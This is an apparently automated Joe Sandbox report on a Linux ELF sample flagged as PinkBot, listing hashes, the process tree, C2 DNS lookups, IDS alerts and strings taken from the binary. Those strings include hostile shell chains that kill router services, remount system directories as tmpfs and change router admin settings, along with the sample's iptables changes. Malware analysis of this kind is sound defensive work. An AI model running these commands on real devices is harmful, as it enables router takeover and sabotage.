Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
file.elf

Overview

General Information

Sample name:file.elf
Analysis ID:1587491
MD5:3a620ff356686b461e0e1a12535bea24
SHA1:a1f6ddfdd78885eb585704131b6dac1d0abae4ea
SHA256:a430ed516a8a596570bc3a496b99cf6c7dd0a69ae0614ab2d2de6e9a8a6c2fc8
Tags:elfPinksluser-Bitsight
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Executes the "iptables" command to insert, remove and/or manipulate rules
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sleeps for long times indicative of sandbox evasion
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1587491
Start date and time:2025-01-10 13:04:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:file.elf
Detection:MAL
Classification:mal72.troj.linELF@0/18@4/0
  • VT rate limit hit for: cnc.pinklander.com
Command:/tmp/file.elf
PID:5523
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • file.elf (PID: 5523, Parent: 5441, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/file.elf
    • file.elf New Fork (PID: 5525, Parent: 5523)
      • file.elf New Fork (PID: 5527, Parent: 5525)
      • file.elf New Fork (PID: 5538, Parent: 5525)
      • sh (PID: 5538, Parent: 5525, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE"
        • sh New Fork (PID: 5540, Parent: 5538)
        • iptables (PID: 5540, Parent: 5538, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE
      • file.elf New Fork (PID: 5546, Parent: 5525)
      • sh (PID: 5546, Parent: 5525, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE"
        • sh New Fork (PID: 5548, Parent: 5546)
        • iptables (PID: 5548, Parent: 5546, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE
      • file.elf New Fork (PID: 5549, Parent: 5525)
        • file.elf New Fork (PID: 5555, Parent: 5549)
        • file.elf New Fork (PID: 5557, Parent: 5549)
        • sh (PID: 5557, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5559, Parent: 5557)
          • iptables (PID: 5559, Parent: 5557, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5587, Parent: 5549)
        • sh (PID: 5587, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5589, Parent: 5587)
          • iptables (PID: 5589, Parent: 5587, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5599, Parent: 5549)
        • sh (PID: 5599, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5601, Parent: 5599)
          • iptables (PID: 5601, Parent: 5599, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5610, Parent: 5549)
        • sh (PID: 5610, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5612, Parent: 5610)
          • iptables (PID: 5612, Parent: 5610, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5629, Parent: 5549)
        • sh (PID: 5629, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5635, Parent: 5629)
          • iptables (PID: 5635, Parent: 5629, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5642, Parent: 5549)
        • sh (PID: 5642, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5644, Parent: 5642)
          • iptables (PID: 5644, Parent: 5642, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5652, Parent: 5549)
        • sh (PID: 5652, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5654, Parent: 5652)
          • iptables (PID: 5654, Parent: 5652, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
        • file.elf New Fork (PID: 5665, Parent: 5549)
        • sh (PID: 5665, Parent: 5549, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
          • sh New Fork (PID: 5667, Parent: 5665)
          • iptables (PID: 5667, Parent: 5665, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L OUTPUT
      • file.elf New Fork (PID: 5550, Parent: 5525)
        • file.elf New Fork (PID: 5618, Parent: 5550)
          • file.elf New Fork (PID: 5620, Parent: 5618)
          • sh (PID: 5620, Parent: 5618, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
            • sh New Fork (PID: 5622, Parent: 5620)
            • iptables (PID: 5622, Parent: 5620, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L INPUT
          • file.elf New Fork (PID: 5623, Parent: 5618)
          • sh (PID: 5623, Parent: 5618, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT"
            • sh New Fork (PID: 5625, Parent: 5623)
            • iptables (PID: 5625, Parent: 5623, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT
        • file.elf New Fork (PID: 5671, Parent: 5550)
          • file.elf New Fork (PID: 5673, Parent: 5671)
          • sh (PID: 5673, Parent: 5671, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"
            • sh New Fork (PID: 5675, Parent: 5673)
            • iptables (PID: 5675, Parent: 5673, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -n -L INPUT
      • file.elf New Fork (PID: 5553, Parent: 5525)
  • cleanup
No yara matches
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:04:51.926756+010020343171Domain Observed Used for C2 Detected192.168.2.15384128.8.8.853UDP
2025-01-10T13:04:52.929204+010020343171Domain Observed Used for C2 Detected192.168.2.15397448.8.8.853UDP
2025-01-10T13:04:55.274675+010020343171Domain Observed Used for C2 Detected192.168.2.15374148.8.8.853UDP
2025-01-10T13:04:56.277243+010020343171Domain Observed Used for C2 Detected192.168.2.15450628.8.8.853UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:04:59.509942+010020181411A Network Trojan was detected13.251.16.15080192.168.2.1550788TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:04:59.509942+010020377711A Network Trojan was detected13.251.16.15080192.168.2.1550788TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: file.elfAvira: detected
Source: file.elfVirustotal: Detection: 57%Perma Link
Source: file.elfReversingLabs: Detection: 60%

Networking

barindex
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.15:39744 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.15:45062 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.15:37414 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2034317 - Severity 1 - ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com) : 192.168.2.15:38412 -> 8.8.8.8:53
Source: /bin/sh (PID: 5540)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5548)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5625)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: unknownNetwork traffic detected: HTTP traffic on port 53726 -> 1088
Source: global trafficTCP traffic: 192.168.2.15:53726 -> 13.251.16.150:1088
Source: /bin/sh (PID: 5540)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5548)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5559)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5589)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5601)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5612)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5635)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5644)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5654)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5667)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5622)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior
Source: /bin/sh (PID: 5625)Iptables executable: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: /bin/sh (PID: 5675)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior
Source: /tmp/file.elf (PID: 5525)Socket: 127.0.0.1:61889Jump to behavior
Source: /tmp/file.elf (PID: 5549)Socket: 127.0.0.1:61869Jump to behavior
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.15:50788
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.15:50788
Source: global trafficHTTP traffic detected: GET /d/index.html HTTP/1.1Host: 150.16.251.13:1088Connection: Keep-AliveAccept: */*Accept-Language: zh-cn,zh;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 150.16.251.13Connection: Keep-AliveAccept: */*Accept-Language: zh-cn,zh;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0Accept-Encoding: gzip
Source: global trafficDNS traffic detected: DNS query: cnc.pinklander.com
Source: file.elfString found in binary or memory: http://%s:%d/d/index.html
Source: file.elfString found in binary or memory: http://%s:%d/d/index.htmlcnc.pinklander.com/tmp/pink/cache_finder_page_webhttp://%s//tmp/pink/fc_ip%
Source: Initial sampleString containing 'busybox' found: busybox killall -9 httpd
Source: Initial sampleString containing 'busybox' found: busybox killall -9 tr69c
Source: Initial sampleString containing 'busybox' found: busybox killall -9 lld2d
Source: Initial sampleString containing 'busybox' found: busybox killall -9 pptp
Source: Initial sampleString containing 'busybox' found: busybox killall -9 openl2tpd
Source: Initial sampleString containing 'busybox' found: rm -rf /tmp/mybin;rm -rf /tmp/mytool;mkdir /tmp/mybin;mkdir /tmp/mytool;cp -rf /bin/* /tmp/mybin/;cp /bin/busybox /tmp/mytool/mount;cp /bin/busybox /tmp/mytool/cp;chmod 777 /tmp/mytool/*;rm -rf /tmp/mybin/tr69c;rm -rf /tmp/mybin/pptp;rm -rf /tmp/mybin/openl2tpd;rm -rf /tmp/mybin/lld2d;rm -rf /tmp/mybin/sntp;rm -rf /tmp/mybin/httpd;mount -t tmpfs -o size=40m tmpfs /bin;/tmp/mytool/cp -rf /tmp/mybin/* /bin/;rm -rf /tmp/mybin;rm -rf /tmp/mytool
Source: Initial sampleString containing 'busybox' found: rm -rf /tmp/mybin;rm -rf /tmp/mytool;mkdir /tmp/mybin;mkdir /tmp/mytool;cp -rf /bin/* /tmp/mybin/;cp /bin/busybox /tmp/mytool/mount;cp /bin/busybox /tmp/mytool/cp;chmod 777 /tmp/mytool/*;rm -rf /tmp/mybin/tr69c;rm -rf /tmp/mybin/pptp;rm -rf /tmp/mybin/openl2tpd;rm -rf /tmp/mybin/lld2d;rm -rf /tmp/mybin/sntp;rm -rf /tmp/mybin/httpd;mount -t tmpfs -o size=40m tmpfs /bin;/tmp/mytool/cp -rf /tmp/mybin/* /bin/;rm -rf /tmp/mybin/*;cp -rf /usr/bin/* /tmp/mybin/;mount -t tmpfs -o size=1m tmpfs /usr/bin;cp -rf /tmp/mybin/* /usr/bin/;rm -rf /tmp/mybin;mount -t tmpfs -o size=1 tmpfs /sbin;mv /usr/bin/wget /usr/bin/init;cp /usr/bin/init /usr/bin/ifconfig;rm -rf /usr/bin/killall;
Source: Initial sampleString containing 'busybox' found: busybox killall -9 sntp
Source: Initial sampleString containing 'busybox' found: :%04X /proc/net/tcp/proc/net/udp/proc//proc/%s/fd/proc/%s/fd/%s%dfilterINPUTTCPDROPUDPACCEPTupnptelnetdigdmptdr/bin/mdm getvalues %s.NameTR069VOIPVOICESIPINTERNETIPTV/bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnection./bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnectionInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnection.%dWANPPPConnection./bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANPPPConnectionInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANPPPConnection.%d/bin/mdm getnames InternetGatewayDevice.WANDevice.1InternetGatewayDevice.WANDevice.1.WANConnectionDevice/bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDeviceInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d/tmp/kt/bin/mdm delobject InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d/bin/mdm setvalues InternetGatewayDevice.X_CU_Function.Web.UserName "%s"/bin/mdm setvalues InternetGatewa
Source: classification engineClassification label: mal72.troj.linELF@0/18@4/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5540)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5548)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5625)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/804/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/3407/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1484/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/131/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/132/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/133/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1479/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/378/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/258/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/259/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/931/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1595/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/812/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/933/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/30/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/3419/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/35/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/3310/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/260/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/261/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/262/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/142/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/263/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/264/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/265/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/145/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/266/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/267/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/268/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/3303/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/269/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1486/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/1806/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/3440/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/270/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5525)File opened: /proc/271/cmdlineJump to behavior
Source: /tmp/file.elf (PID: 5538)Shell command executed: /bin/sh -c "/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE"Jump to behavior
Source: /tmp/file.elf (PID: 5546)Shell command executed: /bin/sh -c "/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE"Jump to behavior
Source: /tmp/file.elf (PID: 5557)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5587)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5599)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5610)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5629)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5642)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5652)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5665)Shell command executed: /bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5620)Shell command executed: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"Jump to behavior
Source: /tmp/file.elf (PID: 5623)Shell command executed: /bin/sh -c "/sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPT"Jump to behavior
Source: /tmp/file.elf (PID: 5673)Shell command executed: /bin/sh -c "/sbin/iptables -n -L INPUT > /tmp/pink/p2p_ipt_check"Jump to behavior
Source: /bin/sh (PID: 5540)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5548)Iptables executable: /sbin/iptables -> /sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUEJump to behavior
Source: /bin/sh (PID: 5559)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5589)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5601)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5612)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5635)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5644)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
